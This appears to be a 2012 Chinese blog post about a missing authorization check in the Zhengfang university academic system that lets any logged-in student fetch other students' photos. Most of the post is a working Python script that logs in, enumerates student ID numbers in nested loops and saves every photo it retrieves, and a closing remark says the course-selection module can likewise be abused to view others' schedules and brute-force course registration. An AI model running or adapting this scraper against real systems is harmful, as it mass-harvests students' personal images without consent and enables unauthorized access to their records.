正方系统的一个漏洞是获取学生图片时没有对学生身份进行检测。理论上来说,获取学生李四的照片,需要首先判断登陆者身份是教师或者学生,如果是学生还要判断登陆者是否为李四本人,而正方系统在这一方面并没有做得很好,导致张三可以轻松地获取李四的照片。
下面是笔者编写的一个简单的爬虫程序,Python 代码如下(Python 3.2),
import http.client
import urllib
import os
_xh = '**********'
_pw = '**********'
VIEWSTATE = 'dDwtMTIwMTU3OTE3Nzs7PpxRSEGelcLnTaPgA3v56uoKweD+'
host = 'jwc.****.edu.cn:8989'
main_url = 'http://' + host
login_page = '/default2.aspx'
login_url = main_url + login_page
readimage_page = '/readimagexs.aspx'
print(main_url)
print(login_url)
conn = http.client.HTTPConnection(host)
login_post_data = urllib.parse.urlencode({
'__VIEWSTATE': VIEWSTATE,
'TextBox1': _xh,
'TextBox2': _pw,
'RadioButtonList1': '学生',
'Button1': '',
'lbLanguage': ''
})
login_post_data = login_post_data.encode('utf-8')
login_headers = {
'Host': host,
'Connection': 'keep-alive',
'Origin': main_url,
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Referer': main_url,
'Accept-Encoding': 'gzip,deflate,sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3'
}
conn.request('POST', login_page, body = login_post_data, headers = login_headers)
result = conn.getresponse()
print(result.status)
#print(result.read())
cookie = result.msg['set-cookie'].split(';')[0]
#print(cookie)
conn.close()
readimage_headers = {
'Host': host,
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip,deflate,sdch',
'Accept-Language': 'zh-CN,zh;q=0.8',
'Accept-Charset': 'GBK,utf-8;q=0.7,*;q=0.3',
'Cookie': cookie
}
conn.request('GET', '/xs_main.aspx' + '?' + 'xh=' + _xh, headers = readimage_headers)
#result = conn.getresponse()
#print(result.status)
#print(result.read())
conn.close()
for year in range(1, 12):#11
for college in range(1, 20):#19
for major in range(1, 15):#14
for mclass in range(1, 10):
for series in range(1, 50):
image_xh = "%02d%02d%02d%02d%02d" % (year, college, major, mclass, series)
readimage_url = readimage_page + '?' + 'xh=' + image_xh
print(readimage_url)
conn.request('GET', readimage_url, headers = readimage_headers)
result = conn.getresponse()
#print(result.status)
image = result.read()
if len(image) > 1024:
save_path = os.path.join(os.path.abspath('./pic/'), image_xh + '.bmp')
print(save_path)
fp = open(save_path, 'wb')
fp.write(image)
fp.close()
else:
print('skip')
print('done')
conn.close()
后记:正方的选课模块依然有这样的漏洞,因此理论上来说,偷窥别人的课程、暴力选课也照样可以实现。
2012-07-01
By whypro